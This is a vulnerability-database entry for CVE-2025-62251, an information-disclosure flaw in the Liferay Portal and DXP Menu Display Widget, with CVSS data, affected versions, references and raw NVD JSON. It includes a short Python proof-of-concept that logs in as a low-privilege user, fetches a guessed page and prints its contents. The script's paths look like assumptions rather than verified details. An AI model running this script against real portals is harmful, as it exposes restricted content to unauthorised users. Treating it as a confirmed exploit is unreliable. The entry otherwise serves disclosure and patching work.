CVE-2025-62251

Description

Liferay Portal 7.3.0 through 7.4.3.119, and Liferay DXP 2023.Q3.1 through 2023.Q3.8, 2023.Q4.0 through 2023.Q4.5, 7.4 GA through update 92 and 7.3 GA though update 36 shows content to users who do not have permission to view it via the Menu Display Widget. This security flaw could result in sensitive information being exposed to unauthorized users.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.3.0 ~ 7.4.3.119

Liferay DXP 2023.Q3.1 ~ 2023.Q3.8

Liferay DXP 2023.Q4.0 ~ 2023.Q4.5

Liferay DXP 7.4 GA ~ update 92

Liferay DXP 7.3 GA ~ update 36

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62251 PoC - Liferay Portal Menu Display Widget Info Disclosure
# Vulnerability: Menu Display Widget exposes content to unauthorized users
# Attack Vector: Network, Low Privilege Required

import requests

# Target Liferay Portal instance
TARGET_URL = "https://target-liferay-instance.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"

# Step 1: Authenticate to obtain session
session = requests.Session()
login_url = f"{TARGET_URL}/c/portal/login"
login_params = {
    "p_p_id": "com_liferay_login_web_portlet_LoginPortlet",
    "p_p_lifecycle": "0",
    "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME,
    "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD,
}
session.post(login_url, params=login_params)

# Step 2: Access page containing Menu Display Widget
# The widget fails to enforce permission checks and returns
# content from restricted pages in the menu structure
widget_page_url = f"{TARGET_URL}/web/guest/menu-display-page"
response = session.get(widget_page_url)

# Step 3: Extract sensitive content from the response
# The response contains menu items with content that the
# low-privilege user should not have access to
if response.status_code == 200:
    # Parse the response to find unauthorized content
    # Look for menu items, page titles, or content snippets
    # that reference restricted pages
    print("[+] Unauthorized content retrieved:")
    print(response.text)
else:
    print(f"[-] Request failed with status: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62251
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62251
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62251/
[4] VulDB https://vuldb.com/cve/CVE-2025-62251
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62251

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62251", "sourceIdentifier": "[email protected]", "published": "2025-10-13T22:15:32.897", "lastModified": "2025-12-12T20:37:37.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Liferay Portal 7.3.0 through 7.4.3.119, and Liferay DXP 2023.Q3.1 through 2023.Q3.8, 2023.Q4.0 through 2023.Q4.5, 7.4 GA through update 92 and 7.3 GA though update 36 shows content to users who do not have permission to view it via the Menu Display Widget. This security flaw could result in sensitive information being exposed to unauthorized users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q3.1", "versionEndExcluding": "2023.q3.9", "matchCriteriaId": "C3ED7CF1-6D8A-40F7-A009-F3A800F955BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndExcluding": "2023.q4.6", "matchCriteriaId": "7C41E249-91C4-4B2D-A8D2-C953A463E14F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3.0", "versionEndExcluding": "7.4.3.119", "matchCriteriaId": "0EFC1E0E-D8E3-4F67-9929-C599CFA1B5D3"}]}]}], "references": [{"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62251", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}